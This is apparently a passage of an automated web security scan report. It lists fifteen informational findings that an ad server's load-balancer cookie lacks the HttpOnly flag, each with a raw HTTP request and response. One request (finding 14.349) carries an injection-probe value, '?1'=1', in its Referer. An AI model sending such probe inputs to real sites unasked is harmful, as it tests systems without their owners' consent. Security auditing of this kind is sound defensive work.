Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4515
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1778979805/Middle
...[SNIP]...

14.344. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1319458490@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1319458490@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1319458490@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4573
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1858990688/Middle
...[SNIP]...

14.345. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1326693698@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1326693698@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1326693698@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4558
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1444744161/Middle
...[SNIP]...

14.346. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1341529874@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1341529874@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1341529874@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4263
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1840815215/Middle
...[SNIP]...

14.347. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1347161569@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1347161569@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1347161569@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4324
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1261949143/Middle
...[SNIP]...

14.348. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1357663315@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1357663315@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1357663315@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4296
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1338348268/Middle
...[SNIP]...

14.349. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1361342262@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1361342262@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1361342262@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:52:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4328
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1521431190/Middle
...[SNIP]...

14.350. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1376047824@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1376047824@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1376047824@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4568
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/333107184/Middle/
...[SNIP]...

14.351. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1413816750@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1413816750@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1413816750@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4535
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/377171051/Middle/
...[SNIP]...

14.352. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1415276276@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1415276276@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1415276276@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4542
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1915180336/Middle
...[SNIP]...

14.353. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1460402778@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1460402778@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1460402778@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:54:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4538
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2144241339/Middle
...[SNIP]...

14.354. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1469263568@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1469263568@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1469263568@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4804
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/984124974/Middle/
...[SNIP]...

14.355. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1533426917@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1533426917@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1533426917@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4292
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/196625630/Middle/
...[SNIP]...

14.356. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1557625622@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1557625622@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1557625622@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4865
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2056801422/Middle
...[SNIP]...

14.357. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1560905621@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1560905621@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1560905621@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4265
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1849024089/Middle
...[SNIP]...

14.358. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1568995865@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1568995865@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1568995865@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4804
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
